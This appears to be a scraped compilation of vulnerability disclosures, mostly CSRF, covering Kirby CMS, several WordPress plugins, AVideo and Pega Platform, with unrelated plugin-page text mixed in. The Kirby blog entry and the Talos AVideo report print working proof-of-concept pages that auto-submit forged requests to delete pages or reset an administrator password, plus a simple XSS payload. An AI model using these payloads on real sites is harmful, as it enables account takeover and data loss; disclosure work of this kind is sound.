An issue was discovered in Kirby 2.5.12. The delete page functionality suffers from a CSRF flaw. A remote attacker can craft a malicious CSRF page and force the user to delete a page.

**Cross Site Request Forgery - Kirby CMS**

Cross Site Request Forgery - Kirby CMS  
By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.  
Title of the Vulnerability:  Stored XSS  
Vulnerability Class: Web Application Exploits.

**Technical Details & Description**: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.

CVE ID allocated: - Undisclosed.

**Product & Service Introduction**: Kirby CMS

**Steps to Re-Produce –**  
1.       Visit the application  
2.       Go to add page option  
3.       Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted  
4\. Payload:  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">  
      <input type="hidden" name="&#95;redirect" value="site&#47;subpages" />  
      <input type="submit" value="Submit request" />  
    </form>  
    <script>  
      document.forms\[0\].submit();  
    </script>  
  </body>  
</html>

**Exploitation Technique:** A attacker can inject perform severe actions including account takeover.  
**Severity Level**: High  
**Security Risk:**  
The presence of such a risk can lead to data loss,privilege escalation etc.

**Affected Product Version**:  Kirby 2.5.12  
**Solution - Fix & Patch:** The application code should be configured to implement anti csrf tokens.

POCs:

  

**Stored XSS - Kirby CMS**

By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Stored Cross Site Scripting

**Title of the Vulnerability**:  Stored XSS

**Vulnerability Class**: Web Application Exploits.

**Technical Details & Description**: The application allows user injected payload which can lead to Stored Cross Site Scripting.

CVE ID allocated: - Undisclosed.

Product & Service Introduction: Kirby CMS

Steps to Re-Produce –

1.       Visit the application

2.       Go to add page option

3.       Under title, enter any XSS payload like: <script>alert("XSS");</script>

4.       Upon the payload being injected, the subsequent page is triggered with XSS.

**Exploitation Technique**: A attacker can inject malicious xss payloads to steal user data.

**Severity Level**: High

**Security Risk**:

The presence of such a risk can lead to data loss, xss shell uploads etc

**Affected Product Version**:  Kirby 2.5.12

**Solution - Fix & Patch**: The application code should be configured to implement strict input validation to prevent XSS payloads.

POCs:

CVE-2018-14519: Zaran's Security Research Blog

Cross-Site Request Forgery (CSRF) leading to plugin settings update in YooMoney ?Kassa ??? WooCommerce plugin <= 2.3.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Важно**

Плагин «ЮKassa» разработан для WooCommerce 3.7 и выше.

The YooKassa plugin is compatible with WooCommerce version 3.7 or later.

**Описание**

Плагин «ЮKassa» – платежное решение для сайтов на WooCommerce:

*   включает 12 способов приема платежей,
*   подходит для юрлиц и ИП,
*   деньги поступают на банковский счет компании.

**Description**

The YooKassa plugin is the payment solution for websites that use WooCommerce:

*   includes 12 payment acceptance methods,
*   suitable for companies and entrepreneurs,
*   settlements are made to the company’s bank account.

**Настройка плагина**

Чтобы принимать платежи через плагин, нужно подать заявку на подключение ЮKassa и заключить договор с компанией «ЮMoney» (онлайн).  
После этого вы получите нужные настройки.  
Инструкция по установке и настройке плагина

**Plugin configuration**

To accept payments via the plugin, apply for onboarding with YooKassa and enter into a contract with YooMoney (online).  
We will send you the required settings afterwards.

**Поддержка передачи данных чека**  
Если вы настраивали отправку чеков в налоговую через партнеров ЮKassa (по 54-ФЗ), в настройках модуля надо включить отправку данных для чека.  
Помощь ЮKassa отправка чеков по 54-ФЗ

**We support the transmission of receipts**  
If you configured the transmission of receipts to the Tax service via YooKassa (in accordance with Federal Law No. 54-FZ), enable the transmission of receipt data in the settings.  
YooKassa’s guide for transmission of receipts in accordance with Federal Law No. 54-FZ

**Тарифы**

Подключение ЮKassa и настройка плагина – бесплатно. Комиссия за прием платежей – от 2,8%.  
Посмотреть все тарифы на сайте ЮKassa

**Rates**  
Onboarding with YooKassa and plugin configuration are free of charge. The commission for accepting payments starts at 2.8%.  
View all rates at the YooKassa website

**Все возможности ЮKassa**

После подключения ЮKassa доступны:  
\* 12 способов приема платежей. Карты, электронные кошельки, интернет-банки, сервисы онлайн-кредитования, наличные, баланс телефона. Вы сами выбираете, какие способы нужны, и перечисляете их в договоре. Кнопки оплаты можно разместить на своем сайте или на сайте ЮMoney: выберите подходящий вариант при настройке плагина.  
\* Личный кабинет на сайте ЮKassa. В нем можно делать возвраты платежей, выставлять и отправлять счета, общаться с менеджерами ЮKassa.

Перейти на сайт ЮKassa

**All features of YooKassa**

After the onboarding, you can access:

12 payment acceptance methods. Cards, e-wallets, online banking, installment plan services, cash, phone balance. Select the methods by yourself and specify them in the contract. You can place the payment buttons at your website or at the YooKassa website: choose the suitable option when setting up the plugin.  
Your own Merchant Profile at the YooKassa website. Use it to make refunds, create and send invoices, or contact the YooKassa manager.  
Visit the YooKassa website

Этот контора мошенники! Они вводят людей в заблуждение. После регистрации на юмони, вы не сможете принимать платежи. Они собирают о вас информацию и ни известно что потом с ней делают.

It is lightweight and work. Other not matter.

Read all 3 reviews

“ЮKassa для WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    yoomoney

**2.4.0**

*   Добавлен метод оплаты СБП с выбором на стороне сайта
*   Обновление SDK до версии 2.5.1

**2.3.3**

*   Исправлена ошибка повторной обработки уже полученных уведомлений от ЮKassa
*   Обновление SDK до 2.4.2

**2.3.2**

*   Добавлена возможность разрешать пользователям сохранять карту после успешной оплаты

**2.3.1**

*   Добавлена проверка роли пользователя при сохранении настроек (разрешено только administrator и manage\_woocommerce)
*   Добавлена проверка токена и сам токен в формах настроек для защиты от CSRF
*   Обновление SDK до 2.4.1

**2.3.0**

*   Добавлен способ авторизации в Юkassa через OAuth.
*   Добавлена подписка на уведомления через OAuth токен
*   Обновлен интерфейс настройки модуля
*   Добавлен перевод
*   Обновлен SDK до версии 2.3.0

**2.2.5**

*   Отключен способ оплаты Webmoney
*   Обновлен SDK до версии 2.2.6

**2.2.4**

*   Изменена инициализация виджета
*   Обновлен SDK до версии 2.2.5

**2.2.3**

*   Обновлен SDK до версии 2.2.2

**2.2.2**

*   Обновлен SDK до версии 2.1.8

**2.2.1**

*   Очистка корзины при оплате через виджет

**2.2.0**

*   Замена Сбербанк Онлайн на SberPay
*   Исправлена работа по очистке корзины
*   Добавлен файл переводов для en локали
*   Обновлен SDK до версии 2.1.7

**2.1.5**

*   Исправление конвертации стоимости товара и доставки

**2.1.4**

*   Курсы валют с учетом номинала
*   Обновлен SDK до версии 2.1.3

**2.1.3**

*   Заменён файл верификации для ApplePay

**2.1.2**

*   Поддержка сайтов без ЧПУ
*   Обновлен SDK до версии 2.1.2

**2.1.1**

*   Игнорируем заказы с другими платежными системами

**2.1.0**

*   Установка системы налогообложения
*   Исправлена ошибка пересчета кредитования при изменении способа доставки
*   Небольшие поправки
*   Обновлен SDK до версии 2.1.0

**2.0.4**

*   Поддержка плагина WPML при возврате с формы оплаты
*   Обновлен SDK до версии 2.0.7

**2.0.3**

*   Работа вкладок на странице настроек при конфликте bootstrap

**2.0.2**

*   Форматирование номера телефона для чеков
*   Обновлен SDK до версии 2.0.5

**2.0.1**

*   Сохранение всех попыток оплаты с привязкой к заказу

**2.0.0**

*   Публикация в магазине приложений

CVE-2022-36379: ЮKassa для WooCommerce

Cross-Site Request Forgery (CSRF) vulnerabilities in WPChill Gallery PhotoBlocks plugin <= 1.2.6 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of August 10, 2022 and is not available for download. This closure is temporary, pending a full review.

This is so good. Has a million options and does it all perfect.

It is so easy to use with the freedom to size every picture as you wish. I also like the lightbar, so visitors can watch your pictures full size. Really great!

Easy an flexible solution, a joy to work with!

Très bon plugin, intuitif et sympa. Je recommande

Ottimo plugin, facile da installare e pubblicare. Aspetto finale elegante

Read all 71 reviews

“Gallery PhotoBlocks” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2022-36292: Gallery PhotoBlocks

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

PSID 

d575770245ca

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-08-02

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities leading to stats and cache deletion were discovered by Vlad Vector (Patchstack) in the WordPress Download Manager plugin (versions <= 3.2.48).

**Solution**

Update the WordPress Download Manager plugin to the latest available version (at least 3.2.49).

**References**

CVE-2022-36288: WordPress Download Manager plugin <= 3.2.48 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

A cross-site request forgery (CSRF) vulnerability exists in WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to increased privileges. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site request forgery (CSRF) vulnerability exists in WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to increased privileges. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-352 - Cross-Site Request Forgery (CSRF)

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo lacks any Cross-Site Request Forgery protection across the whole application. This means that AVideo has no ability to make sure that a request is intentionally made by the user that performed it.

The simplest way to show how this can be exploited is via the password change feature. To change their own password, a logged-in user can make a request like the following:

    curl -k 'https://192.168.1.200/objects/userUpdate.json.php' \
      -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=123456;' \
      --data-raw 'user=admin&pass=newpass'
    

An attacker can trick an administrator into visiting a website that does that same request in the background, leading to a password change where the password is controlled by the attacker. A simple example of such a malicious page is the following:

    <form id='csrf' method='POST' action='https://192.168.1.200/objects/userUpdate.json.php'>
      <input type='hidden' name='user' value='admin'>
      <input type='hidden' name='pass' value='newpass'>
    </form>
    <script>document.getElementById("csrf").submit()</script>
    

Where 192.168.1.200 is more likely the hostname where the AVideo website is hosted. Such a page could be hosted on any attacker-controlled host. Once loaded it will just show a blank page; however, the POST request will automatically happen in the background. If the victim is logged into the AVideo website as administrator, their password will change into “newpass”.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-29468: TALOS-2022-1534 || Cisco Talos Intelligence Group

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Max Foundry MaxButtons plugin <= 9.2 at WordPress.

 Verified

 Fixed

**4.3**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 MaxButtons

Type

Plugin

Vulnerable versions

 <= 9.2

Fixed in

 9.3

PSID 

b82d75299e1a

CVE ID 

 CVE-2022-36346

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Credits

 Muhammad Daffa (Patchstack Alliance)

Publicly disclosed

2022-08-02

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by Muhammad Daffa (Patchstack Alliance) in WordPress MaxButtons plugin (versions <= 9.2).

**Solution**

Update the WordPress MaxButtons plugin to the latest available version (at least 9.3).

**References**

CVE-2022-36346: WordPress MaxButtons plugin <= 9.2 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in ThimPress WP Hotel Booking plugin <= 1.10.5 at WordPress.

 Verified

 Not fixed

**4.3**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 WP Hotel Booking

Type

Plugin

Vulnerable versions

<= 1.10.5

Fixed in

N/A

PSID 

0a7f6ee8db85

CVE ID 

 CVE-2021-36852

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Credits

 Ngo Van Thien (Alliance project)

Publicly disclosed

2022-08-02

**Details**

Cross-Site Request Forgery (CSRF) vulnerability discovered by Ngo Van Thien (Patchstack Alliance) in the WordPress WP Hotel Booking plugin (versions <= 1.10.5).

**Solution**

No patched version is available.

**References**

CVE-2021-36852: WordPress WP Hotel Booking plugin <= 1.10.5 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Pega Platform from 7.3 to 8.7.3 is affected by an XSS issue due to a misconfiguration of a datapage setting.

Pega continually works to implement security controls designed to protect client environments.  With this focus, Pega has issued hotfixes for 3 **medium** security vulnerabilities in Pega Platform:

**Issue**

**Description**

**Impact**

D22

Cross Site Script (XSS) vulnerability

Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.  

Clients with internet-facing applications should update or apply the hotfix. 

Clients running their own infrastructure should consult their security teams.

E22

Reflected Cross Site Script (XSS) vulnerability

F22

Reflected Cross Site Request Forgery (CSRF) vulnerability

This vulnerability may only be exploited by authenticated users with security administrator privileges.  

Clients should periodically review who they have granted elevated privileges to.

We are not aware of any of our clients being compromised as a result of these vulnerabilities.

If you are a **Pega Cloud client**, your Pega Cloud® environments running the relevant Pega versions listed in the table below, are being proactively remediated by Pega. CM cases are being created for each of your environments which provides the schedule of when the hotfixes will be applied.

If you are a United States **Pega Cloud for Government (PCFG) client**, SR cases are being created which will provide the relevant hotfixes for you to apply to your PCFG environments. A system restart, by the Pega Cloud team, will then be required for the hotfixes to take effect.

If you are an **on–premises client**, please review the tables below to determine which hotfixes correspond to your Pegasystems installation. Once you have determined the appropriate hotfix IDs, please submit **hotfix requests** using **My Support Portal**.  As always, **be sure you have appropriate backups in place _before_ applying the hotfixes.** Note that a system restart will be required for the hotfixes to take effect. 

Information regarding the availability of the hotfixes will be publicly posted on Pega Support Center on **Monday, Aug 22, 2022**. In order to give all Pega clients time to patch their on-premises systems, we request that clients **not discuss this in public forums until _after_ Aug 22.** 

As always, we recommend our clients review our Security Checklist regularly. 

**CVE Details**

**CVE Details**

**D22**

**E22**

**F22**

Software/Product

Pega Platform

Pega Platform

Pega Platform

Affected Version(s)

From 8.5.4 to  8.7.3

From 7.3 to 8.7.3

From 8.3 to  8.7.3

CVE ID

CVE-2022-35654

CVE-2022-35655

CVE-2022-35656

CVSS Rating

6.1

6.1

6.8

Description

Cross Site Script (XSS) vulnerability

Reflected Cross Site Script (XSS) vulnerability

Reflected Cross Site Request Forgery (CSRF) vulnerability

**Hotfixes**

Version

D22

E22

F22

8.5.6

HFIX-83957

Follow guidance\*

Update to 8.6.5 or higher

8.6.5

HFIX-83956

Follow guidance\*

HFIX-83958

8.7.3

HFIX-84023

Follow guidance\*

HFIX-84022

8.8

Fixed in release

Follow guidance\*

Fixed in release

These issue will be included as part of the product in the 8.6.6, 8.7.4, and 8.8 patch and minor releases.

**\*E22 Guidance:** 

As a best practice, you should update your Pega environment to the latest release to take advantage of the latest features, capabilities, and security and bug fixes. See Keeping current with Pega.

**Local Change** **Solution:**

**All versions from 7.3 and higher need to review their allow-listed** **Data Pages and adjust based on the two scenarios below:**

The activity pzGetDataPageJSON internally checks the allow-listed Data Pages that are specified in the HTML rule pyPublicDataPageWhiteList. 

**_How to use_** **_the HTML rule pyPublicDataPageWhiteList_** 

Use of the HTML rule pyPublicDataPageWhiteList depends on two conditional scenarios. 

**Scenario 1****: If the application does not use pega.api.ui.actions.getDataPage() for any business use case** 

As the application developer, you can make the HTML rule pyPublicDataPageWhiteList empty. With this change, any calls to  pega.api.ui.actions.getDataPage() or direct processing of the activity pzGetDataPageJSON will return an empty response. 

**Scenario** **2: If the application uses either the activity pzGetDataPageJSON  or the JavaScript API pega.api.ui.actions.getDataPage() for any business use case**   

Use non-parameterized Data Pages for these use cases and add only those data page names (each data page entry in newline) in the HTML rule pyPublicDataPageWhiteList. With this change, you are restricting only a few Data Pages that can be returned when using the Public JavaScript API. To specify the Data Page(s), use the following format: (each Data Page will be on a new line)

DataPage1  
DataPage2  
DataPage3

The HTML rule pyPublicDataPageWhiteList was introduced in the following Pega Platform versions: 

*   Pega Platform version 7.3.1 (HFIX-54435)
    
*   Pega Platform version 7.4 (HFIX-54126)
    
*   If you are using Pega Platform version 8.1.x, the rule exists in Pega Platform version 8.1.6 and later patch releases. 
    
*   If you are using Pega Platform version 8.2.x, the rule exists in Pega Platform version 8.2.3 and later patch releases.
    
*   Pega Platform version 8.2.1 (HFIX-63456) 
    
*   If you are using Pega Platform version 8.3.x, the rule exists in Pega Platform version 8.3.1 and later patch releases. 
    
*   If you are using Pega Platform 8.4.x and all later major releases and patch releases, the rule exists in these releases and in future releases. 
    

If you do not see your version listed, you should follow the best practice of updating to the latest release to be able to apply the local change.

CVE-2022-35655: Collaboration Center

Cross-Site Request Forgery (CSRF) vulnerability in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

 Verified

 Fixed

**4.2**

CVSS 3.1 score Medium severity

Monitoring Coming soon

PSID 

08f6b57f5dd4

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-08-02

**Details**

Cross-Site Request Forgery (CSRF) vulnerability leading to template status change discovered by Muhammad Daffa (Patchstack Alliance) in WordPress Download Manager plugin (versions <= 3.2.48).

**Solution**

Update the WordPress Download Manager plugin to the latest available version (at least 3.2.49).

**References**

CVE-2022-34347: WordPress Download Manager plugin <= 3.2.48 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

The Yotpo Reviews for WooCommerce WordPress plugin through 2.0.4 lacks nonce check when updating its settings, which could allow attacker to make a logged in admin change them via a CSRF attack.

Tag

#csrf